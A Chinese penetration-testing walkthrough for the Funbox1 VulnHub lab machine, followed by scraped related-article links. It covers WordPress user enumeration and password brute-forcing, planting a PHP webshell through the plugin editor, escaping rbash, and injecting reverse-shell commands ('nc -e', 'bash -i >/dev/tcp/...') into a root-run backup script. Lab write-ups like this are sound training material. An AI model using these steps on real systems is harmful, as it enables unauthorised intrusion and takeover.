Funbox1:noname靶机渗透练习

首先在这里声明一下,这个funbox系列靶机有一个毛病,反正我这里对于该系列每一个靶机都是一直存在的,具体就是:靶机ova安装之后开启,默认桥接下靶机的网卡是没有被分配ip,需要我们手动修改密码登陆进去之后dhclient [网卡]之后ifconfig才有正确网段ip

具体修改密码方式:重启时长按shift,直到出现一个登陆模式选择框界面,e键进入,在类似于类似于[kernel /vmlinuz-2.6.15 ro root=/dev/hda2]后面加 init=/bin/bash然后重启,mount -no remount,rw /,passwd,输入自己的密码,sync,mount -no remount,ro /即可

拿到这个靶机,还是老步骤,探测信息
靶机mac:00:0C:29:68:95:FE
kali:arp-scan -l或者netdiscover扫描
得到靶机ip:10.174.93.184
探测端口:nmap -sV -A -p- 10.174.93.184

根据nmap结果可以看到开启如下服务及端口:
1.ftp服务开放,看看有没有匿名登陆
2.22ssh端口开放,看看能不能爆破
3.80端口开放http服务,看看网站能不能getshell
测试发现ftp不能匿名登陆

那么看看网站吧
直接访问这个ip发现不行,说什么DNS解析不到访问不了,这个也是很常见的靶机问题了,并且根据网站标题提示可知道这个访问不到的服务器名字为funbox.fritz.box,这时候需要改一下hosts文件,添加一行:10.174.93.184 funbox.fritz.box,然后即可访问
发现网站时wordpress,那么用wpscan扫一扫
扫用户:wpscan --url http://funbox.fritz.box --enumerate u
扫主题:wpscan --url http://funbox.fritz.box --enumerate vt
扫插件:wpscan --url http://funbox.fritz.box --enumerate pt
发现存在两个用户admin和joe,主题和插件都没有发现



那么我们就可以试试继续爆破用户密码
wpscan --url http://funbox.fritz.box -P /usr/share/wordlists/rockyou.txt
发现爆破出来两个用户的密码了
admin/iubire
joe/12345

接下来我们就可以直接去wp-admin用管理员用户登陆看看了
我们主要看看appearance中theme模块以及plugin模块
进入theme editor找到index.php,我们尝试插入一个php木马
保存的时候发现好像无法写入,需要用STFP服务什么的
那么我们就尝试一下plugins editor,修改index.php插入马,发现成功


这时我们得到木马的地址:/wp-content/plugins/akismet/index.php
蚁剑连接成功


得到的是低权限www-data用户组,需要进一步考虑提权问题
可以发现存在两个用户:joe和funny,首先进joe看看发现有一个mbox,但里面什么都没有,可能是存在权限的问题,无法查看具体内容
我们此时想到还有一个点没用呢ssh
ssh登录一下joe看看这个mbox是什么玩意:ssh joe@10.174.93.184
发现里面存在一句话很关键:Hi Joe, please tell funny the backupscript is done.
另外我们刚刚在蚁剑中看到funny中确实有什么backup的文件
根据提示我们到funny中看看相关的文件
此时会出现一个cd /home的rbash的禁止,直接bash -i越过权限,解决
cat .backup.sh

这个文件于bin/bash执行,那么我们是否直接来个反弹shell?
vim写入:nc -e /bin/bash 10.174.20.160 9999
kali段监听:nc -lvvp 9999
发现没反应,应该是因为大多数的靶机没有nc -e指令
那就用老样式:bash -i >/dev/tcp/10.174.20.160/9999 0>&1 2>&1
反弹成功得到root查看flag.txt

74.20.160/9999 0>&1 2>&1
反弹成功得到root查看flag.txt

Funbox1:noname靶机渗透练习相关推荐

  1. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  2. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  3. [HTB]“Heist”靶机渗透详细思路

    今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...

  4. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  5. 【渗透测试】靶机渗透Vulnhub-bulldog

    目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...

  6. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  7. Bulldog靶机渗透

    Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...

  8. 【VulnHub靶机渗透】一:BullDog2

    在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...

  9. bulldog2 靶机渗透

    bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...

最新文章

  1. ping 命令还能这么玩?
  2. Python手动编程实现斐波那契数列
  3. UML基本架构建模--获取类
  4. Spring.NET学习笔记11——自定义对象行为(基础篇) Level 200
  5. Linux环境进程间通信(五): 共享内存(上)
  6. 通俗讲解【重定向】及其实践
  7. 弄潮儿数据_SINX 信息数据的“弄潮儿”
  8. [翻译] JTBorderDotAnimation
  9. php不能tmp,PHP无法找到tmp目录
  10. openresty lua集成kafka
  11. Java经典编程题50道之四十二
  12. Java实现昵图网摄影图片爬虫
  13. 2021年,小傅哥の年终总结
  14. 网页视频旋转(B站)
  15. android listener使用实例,如何使用lambda表达式/缩短onclicklisteners android studio(示例代码)...
  16. python 报错 TypeError: tuple indices must be integers or slices, not tuple
  17. python3识别图中的文字_Python3调用百度AI识别图片中的文字功能示例【测试可用】...
  18. 分析5 中值定理与Taylor公式
  19. 《C语言程序设计》江宝钏主编-习题6-1-温度转换
  20. linux xdm 启动执行文件,Linux下配置XDM登录服务器

热门文章

  1. 没智商没背景没资本,你还不学习?(转载)
  2. h5支付不能打开支付宝 ios_iOS支付宝支付(Alipay)详细接入流程以及项目中遇到的问题分析...
  3. 3C认证机构 国内3c认证机构有哪些?
  4. 华为云部署K8s之容器技术.docker安装
  5. Android——实现人脸支付
  6. 年轻人在股市里亏钱的16种方式
  7. 【EndNote】解决EndNote无法同步的问题
  8. 2020软考信息系统项目管理师_项目管理(下) 视频培训教程-任铄-专题视频课程
  9. 基于SSM的物流仓储管理系统(包远程安装配置和代码讲解)
  10. python图像数据是几维数据_Python二维数据分析